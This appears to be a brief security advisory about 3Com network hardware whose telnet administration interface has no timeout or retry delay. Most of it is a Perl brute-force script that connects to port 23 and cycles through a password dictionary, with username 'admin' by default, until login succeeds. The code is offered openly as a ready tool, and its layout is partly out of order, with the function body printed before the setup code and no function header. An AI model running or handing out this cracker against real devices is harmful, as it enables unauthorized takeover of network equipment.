Some of 3Com's network hardware employ a built-in telnet daemon, that allows administrating of the remote hardware via a command line like interface. This interface is password protected, but since the product does not support a timeout or retries delay it can be easily brute forced. The following is an exploit code that does just that - brute force the telnet daemon's password.
Credit:
The information has been provided by Siberian.
recv(SOCK,$ol,1,0);
while(($ol ne "L") && ($ol ne "P") && ($ol ne "M")){
recv(SOCK,$ol,1,0);
}
while(defined($passwd = <FILE1>)) {
chop($passwd);
print ".";
while($i != 3) {
if($ol eq "L"){
send(SOCK,$userf,0);
}
if($ol eq "P") {
$passwd = join '', $passwd, chr(13), chr(10);
send(SOCK,$passwd,0);
}
recv(SOCK,$ol,1,0);
while(($ol ne "L") && ($ol ne "P") && ($ol ne "M")){
recv(SOCK,$ol,1,0);
}
if($ol eq "M") {
print "\n\nPassword for $userh is $passwd\n";
exit 0;
}
$i++
}
$i=1;
}
print "\n\nIt's sad but true, you failed.\n";
}
print "\n3Com Hardware Telnet Login Cracker, written by Siberian \- Sentry Research Labs\n\n";
print "Get the latest Version at www.sentry-labs.com\n\n";
$remote = shift || die "usage: ./crack3com.pl [target host] [dictionary] (username)";
$passf = shift || die "usage: ./crack3com.pl [target host] [dictionary] (username)";
$userf = shift || ($userf = "admin");
$iaddr = inet_aton($remote) or die "No target host computer found!";
$paddr = sockaddr_in(23, $iaddr);
$prot = getprotobyname('tcp');
socket(SOCK, AF_INET, SOCK_STREAM, $prot) or die "socket: $!";
connect(SOCK, $paddr) || die "Can't connect to target host!";
open(FILE1, "$passf") || die "Can't open Password list!";
recv(SOCK,$ol,1,0);
$bs = join '', chr(10),chr(13),chr(10);
send(SOCK, $bs, 0);
guesspass();
